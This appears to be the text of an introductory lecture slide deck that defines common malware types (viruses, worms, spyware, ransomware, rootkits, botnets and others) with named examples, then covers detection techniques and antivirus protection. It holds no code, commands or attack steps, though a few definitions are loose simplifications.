2. WHAT IS MALWARE?
• Malware is intrusive software that is designed to damage and destroy
computers and computer systems.
• Malware is a contraction for “malicious software”.
• Malware gets installed in your device and performs
unwanted tasks.
• Mainly designed to transmit information about your web
browsing habits to the third party
4. VIRUS
• Virus is a program written to enter to your computer and damage/alter your
files/data.
• A virus might corrupt or delete data on your computer. Viruses can also
replicate themselves.
• A computer Virus is more dangerous than a computer worm as it makes
changes or deletes your files while worms only replicates itself with out making
changes to your files/data.
• . Once downloaded, the virus will lay dormant until the file is opened and in use.
• Viruses are designed to disrupt a system’s ability to operate. As a result,
viruses can cause significant operational issues and data loss
5. WORMS
• Worms are a malicious software that rapidly
replicates and spreads to any device within the
network.
• Unlike viruses, worms do not need host
programs to disseminate.
• A worm infects a device via a downloaded file
or a network connection before it multiplies
and disperses at an exponential rate.
• It doesn’t harm any data/file on the computer.
• Unlike a virus, it does not need to attach itself
to an existing program.
• Worms spread by exploiting vulnerabilities in
operating systems
• worms can be used by malicious actors to
launch DDoS attacks
• Eg- Stuxnet
6. SPYWARE • Spyware is installed with or without your permission on
your personal computers to collect information about
users, their computer or browsing habits tracks each and
everything that you do without your knowledge and send
it to remote user.
• Rather than simply disrupting a device’s operations,
spyware targets sensitive information and can grant
remote access to predators.
• Spyware is often used to steal financial or personal
information.
• It also can download other malicious programs from
internet and install it on the computer.
• Spyware works like adware but is usually a separate
program that is installed unknowingly when you install
another freeware type program or application.
• A specific type of spyware is a keylogger, which records
your keystrokes to reveal passwords and personal
information.
• Eg- DarkHotel
7. ADWARE
• Adware is malicious software used to
collect data on your computer usage
and provide appropriate advertisements
to you.
• While adware is not always dangerous,
in some cases adware can cause
issues for your system.
• Adware can redirect your browser to
unsafe sites, and it can even contain
Trojan horses and spyware.
• Additionally, significant levels of
adware can slow down your system
noticeably.
• Because not all adware is malicious, it
is important to have protection that
constantly and intelligently scans these
programs.
• Eg- Fireball
8. TROJAN HORSE • A Trojan horse is not a virus. It is a
destructive program that looks as a
genuine application.
• Unlike viruses, Trojan horses do not
replicate themselves but they can be
just as destructive.
• Trojans also open a backdoor entry to
your computer which gives malicious
users/programs access to your system,
allowing confidential and personal
information to be theft.
• Once the user downloads it, the Trojan
virus can gain access to sensitive data
and then modify, block, or delete the
data.
• Eg- Emotet
9. RANSOMWARE
• Ransomware is malicious software
that gains access to sensitive
information within a system, encrypts
that information so that the user
cannot access it, and then demands a
financial payout for the data to be
released.
• Ransomware is commonly part of a
phishing scam.
• By clicking a disguised link, the user
downloads the ransomware.
• The attacker proceeds to encrypt
specific information that can only be
opened by a mathematical key they
know. When the attacker receives
payment, the data is unlocked.
• Eg- RobbinHood
10. FILELESS MALWARE
• Fileless malware is a type of
memory-resident malware.
• As the term suggests, it is
malware that operates from a
victim’s computer’s memory,
not from files on the hard drive.
• Because there are no files to
scan, it is harder to detect than
traditional malware.
• It also makes forensics more
difficult because the malware
disappears when the victim
computer is rebooted.
• In late 2017, the Cisco Talos
threat intelligence team posted
an example of fileless malware
that they called
DNSMessenger.
• Eg- Astaroth
11. ROOTKITS
• A rootkit is software that gives
malicious actors remote control
of a victim’s computer with full
administrative privileges.
• Rootkits can be injected into
applications, kernels,
hypervisors, or firmware.
• They spread through phishing,
malicious attachments,
malicious downloads, and
compromised shared drives.
• Rootkits can also be used to
conceal other malware, such as
keyloggers.
12. KEYLOGGER
• A keylogger is a type of spyware that
monitors user activity. Keyloggers
have legitimate uses; businesses can
use them to monitor employee activity
and families may use them to keep
track of children’s online behaviors.
• However, when installed for malicious
purposes, keyloggers can be used to
steal password data, banking
information and other sensitive
information.
• Keyloggers can be inserted into a
system through phishing, social
engineering or malicious downloads.
• Eg- Olympic Vision
13. BOT/BOTNETS
• A bot is a software application that
performs automated tasks on
command.
• They’re used for legitimate purposes,
such as indexing search engines, but
when used for malicious purposes,
they take the form of self-
propagating malware that can
connect back to a central server.
• Usually, bots are used in large
numbers to create a botnet, which is
a network of bots used to launch
broad remotely-controlled floods of
attacks, such as DDoS attacks.
Botnets can become quite expansive.
• For example, the Mirai IoT botnet
ranged from 800,000 to 2.5M
computers.
• Eg- Echobot
14. HOW TO DETECT AND RESPOND TO MALWARE?
• Malware will inevitably penetrate your network.
• You must have defences that provide significant visibility and breach
detection.
• In order to remove malware, you must be able to identify malicious actors
quickly. This requires constant network scanning.
• Once the threat is identified, you must remove the malware from your
network.
15. PROTECTING AGAINST MALWARE
• Malware security protection provides that second vital layer of protection for
your computer or network.
• A robust antivirus software package is the primary component of technological
defenses that every personal and business computer system should have.
• Well-designed antivirus protection has several characteristics. It checks any
newly downloaded program to ensure that it is malware-free.
• It periodically scans the computer to detect and defeat any malware that might
have slipped through.
• It is regularly updated to recognize the latest threats.
16. ANTIVIRUS / ANTI-MALWARE SOFTWARE
• For example, Microsoft Security Essentials (for Windows XP, Vista, and
Windows 7) and Windows Defender (for Windows 8, 10 and 11) provides
real-time protection.
• The Windows Malicious Software Removal Tool removes malicious
software from the system.
• Additionally, several capable antivirus software programs are available for
free download from the Internet (usually restricted to non-commercial use).
17. ANTIVIRUS / ANTI-MALWARE SOFTWARE
• Real-time protection: They can provide real time protection against the
installation of malware software on a computer. This type of malware
protection works the same way as that of antivirus protection in that the
anti-malware software scans all incoming network data for malware and
blocks any threats it comes across.
• Sandboxing: Provide sandboxing of apps considered dangerous (such as
web browsers where most vulnerabilities are likely to be installed from)
18. ANTIVIRUS / ANTI-MALWARE SOFTWARE
• Removal: Anti-malware software programs can be used solely for detection
and removal of malware software that has already been installed onto a
computer. This type of anti-malware software scans the contents of the
Windows registry, operating system files, and installed programs on a
computer and will provide a list of any threats found, allowing the user to
choose which files to delete or keep, or to compare this list to a list of
known malware components, removing files that match.
19.
20. MALWARE DETECTION TECHNIQUES
• Anomaly-based: Uses its knowledge of what constitutes
normal behaviour to decide the maliciousness of a program•
• Specification-based detection: leverage a rule set of what is
valid behaviour
• Signature-based: Uses its characterization of what is known
to be malicious to decide the maliciousness of a program
21. MALWARE DETECTION TECHNIQUES
• Specific approach is determined by how the technique gathers information
to detect malware
• Static analysis: Before the program under inspection executes i.e.
Sequence of bytes
• Dynamic analysis: During or after program execution i.e. Systems seen on
the runtime stack